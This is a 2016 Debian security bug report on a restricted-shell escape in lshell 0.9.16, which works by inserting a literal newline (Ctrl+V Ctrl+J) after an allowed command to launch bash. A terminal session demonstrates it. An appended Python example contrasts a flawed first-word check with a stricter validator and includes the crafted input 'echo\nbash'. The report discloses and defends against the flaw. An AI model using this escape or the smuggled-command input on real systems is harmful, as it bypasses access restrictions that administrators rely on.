[Secure-testing-team] Bug#834946: lshell: Shell outbreak with multiline commands
Vladislav Yarmak
yarmak.vladislav at gmail.com
Sat Aug 20 20:07:13 UTC 2016
Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole
From: Vladislav Yarmak <yarmak.vladislav at gmail.com>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: lshell: Shell outbreak with multiline commands
Message-ID: <20160820194404.1737.15528.reportbug at debian>
X-Mailer: reportbug 6.6.3
Date: Sat, 20 Aug 2016 22:44:04 +0300
X-Debbugs-Cc: Debian Security Team <team at security.debian.org>,
Debian Testing Security Team
<secure-testing-team at lists.alioth.debian.org>
Just type <CTRL+V><CTRL+J> after any allowed command and then type the desired restricted command:
root@debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root@debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo
bash
testuser@debian:~$ ps -f
UID PID PPID C STIME TTY TIME CMD
testuser 1641 1640 0 22:27 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell
testuser 1642 1641 0 22:27 pts/1 00:00:00 sh -c set -m; echo bash
testuser 1643 1642 0 22:27 pts/1 00:00:00 bash
testuser 1648 1643 0 22:27 pts/1 00:00:00 ps -f
The problem exists in the current upstream code. There is an open issue on GitHub but no reaction yet: https://github.com/ghantoos/lshell/issues/149.
The command parser in this shell is beyond recovery. I recommend replacing this shell with a symlink to /usr/sbin/nologin.
-- System Information:
Debian Release: 8.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages lshell depends on:
ii adduser 3.113+nmu3
ii python 2.7.9-1
lshell recommends no packages.
lshell suggests no packages.
-- no debconf information
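
The following is an added example, not part of the original report and not lshell's own code. It is a simplified model of the failure class shown in the session above (the ps output shows the typed line being handed to sh -c): an allow-list check that looks at the first word only, next to a stricter check that rejects control characters before parsing. The function names and the sample input are assumptions made for illustration.

```python
import shlex

# Allowed commands as listed by '?' in the session above.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}

# Characters a POSIX shell treats as syntax; none is needed for a plain argv.
SHELL_META = set(";&|`$(){}<>\\")


def naive_is_allowed(line):
    """Hypothetical first-word check: whitespace splitting hides the newline."""
    words = line.split()
    return bool(words) and words[0] in ALLOWED


def commands_seen_by_sh(line):
    """First word of each command 'sh -c line' would run: newline separates commands."""
    return [part.split()[0] for part in line.splitlines() if part.strip()]


def safe_argv(line):
    """Return an argv list for shell-free execution, or None if the line is rejected."""
    # Reject every control character (newline, carriage return, tab, DEL, ...)
    # before any parsing, so validator and executor see the same single command.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in line):
        return None
    if SHELL_META & set(line):
        return None
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return argv  # intended for subprocess.run(argv), never for 'sh -c'


if __name__ == "__main__":
    crafted = "echo\nbash"  # constructed sample mirroring the reported input
    print("naive check passes:", naive_is_allowed(crafted))
    print("sh would run:", commands_seen_by_sh(crafted))
    print("strict check result:", safe_argv(crafted))
    print("benign line:", safe_argv("ls -l /tmp"))
```

The strict check returns an argument list so the caller can execute it without a shell, which removes the second parser that disagreed with the first.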